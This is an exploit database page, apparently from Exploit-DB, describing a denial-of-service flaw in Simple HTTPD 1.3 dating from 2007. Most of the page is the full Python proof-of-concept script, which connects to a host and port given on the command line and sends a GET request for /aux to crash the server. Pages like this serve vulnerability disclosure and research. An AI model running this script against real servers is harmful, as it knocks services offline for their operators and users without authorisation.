Simple HTTPD 1.3 /aux Denial of Service

vendor:

Simple HTTPD

by:

shinnai

5.5

CVSS

MEDIUM

Denial of Service

CWE

Product Name: Simple HTTPD

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Simple HTTPD 1.3 /aux Denial of Service

This exploit targets the Simple HTTPD 1.3 server by sending a specific GET request to the /aux endpoint, causing a denial of service condition. The vulnerability exists in the way the server handles this particular request, leading to a crash or unresponsiveness. The exploit utilizes a socket connection to send the malicious request to the target host and port. This vulnerability was discovered by shinnai and the details can be found on their website at http://shinnai.altervista.org.

Mitigation:

There is no known mitigation or remediation for this vulnerability. It is recommended to upgrade to a newer version of the Simple HTTPD server or switch to a different web server software.

Source

Exploit-DB raw data:

#usage: poc.py host port

import socket
import sys

print "-----------------------------------------------------------------------"
print "Simple HTTPD 1.3 /aux Denial of Service\n"
print "url: http://shttpd.sourceforge.net\n"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "-----------------------------------------------------------------------"

host = sys.argv[1]
port = long(sys.argv[2])

try:
   request =  "GET /aux HTTP/1.1\n\n"
   connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   connection.connect((host, port))
   connection.send(request)
except:
   print "Unable to connect. exiting."

# milw0rm.com [2007-12-11]